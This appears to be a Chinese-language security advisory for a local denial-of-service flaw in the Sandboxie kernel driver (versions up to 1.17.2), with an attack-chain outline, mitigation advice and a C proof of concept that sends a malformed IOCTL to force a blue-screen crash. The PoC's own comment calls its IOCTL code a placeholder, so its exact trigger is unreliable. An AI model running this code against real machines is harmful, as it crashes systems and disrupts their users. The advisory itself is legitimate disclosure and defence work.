CVE-2026-32603 CVSS 6.5 中危

CVE-2026-32603 Sandboxie 本地拒绝服务漏洞

披露日期: 2026-05-05

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-32603

漏洞类型

拒绝服务

CVSS评分

6.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Sandboxie

漏洞概述

Sandboxie是一款Windows开源沙箱隔离软件。在1.17.2及更早版本中，其内核驱动程序存在本地拒绝服务漏洞。标准沙箱内的低权限进程可向驱动发送恶意IOCTL请求，导致系统立即发生蓝屏死机（BSOD）。该漏洞影响标准沙箱配置，但不影响安全强化沙箱配置。

技术细节

该漏洞位于Sandboxie的内核驱动程序（\Device\SandboxieDriverApi）中。攻击者无需管理员权限，仅需在Standard Sandbox（标准沙箱）环境中运行即可。利用原理是发送一个格式错误的IOCTL（输入/输出控制）代码给驱动程序。由于驱动程序未能正确验证或处理该异常请求，导致内核处理逻辑出错，进而触发系统崩溃（BSOD）。虽然攻击者无法直接提升权限或窃取数据，但通过反复触发崩溃可严重影响系统可用性。值得注意的是，Security Hardened Sandbox（安全强化沙箱）配置不受此漏洞影响，说明该配置对IOCTL的处理机制更为严格。

攻击链分析

STEP 1

步骤1

攻击者在受影响版本（<=1.17.2）的Sandboxie标准沙箱内运行一个无特权的恶意进程。

STEP 2

步骤2

该进程尝试打开并获取Sandboxie内核驱动程序（\Device\SandboxieDriverApi）的句柄。

STEP 3

步骤3

进程向驱动程序发送特制的、格式错误的IOCTL控制代码。

STEP 4

步骤4

驱动程序在处理该异常请求时发生错误，导致内核崩溃，系统立即蓝屏死机（BSOD）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#include <windows.h>
#include <stdio.h>

// PoC for CVE-2026-32603: Sandboxie Kernel Driver DoS
// Triggers a BSOD by sending a malformed IOCTL to SandboxieDriverApi
int main() {
    HANDLE hDevice = CreateFileA("\\\\.\\SandboxieDriverApi",
                                GENERIC_READ | GENERIC_WRITE,
                                0,
                                NULL,
                                OPEN_EXISTING,
                                FILE_ATTRIBUTE_NORMAL,
                                NULL);

    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("Failed to open device. Make sure you are running inside a Standard Sandbox.\n");
        return 1;
    }

    DWORD bytesReturned;
    char buffer[1024] = {0}; // Malformed input buffer
    // Note: Specific IOCTL code value varies or needs fuzzing, representing the trigger here.
    DWORD ioctlCode = 0x222003; 

    printf("Sending malformed IOCTL...\n");
    DeviceIoControl(hDevice, ioctlCode, buffer, sizeof(buffer), NULL, 0, &bytesReturned, NULL);

    CloseHandle(hDevice);
    return 0;
}

影响范围

Sandboxie <= 1.17.2

防御指南

临时缓解措施

对于无法立即更新软件的用户，建议将沙箱配置更改为Security Hardened Sandbox（安全强化沙箱），该配置能够有效防御此漏洞，防止恶意IOCTL导致系统崩溃。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表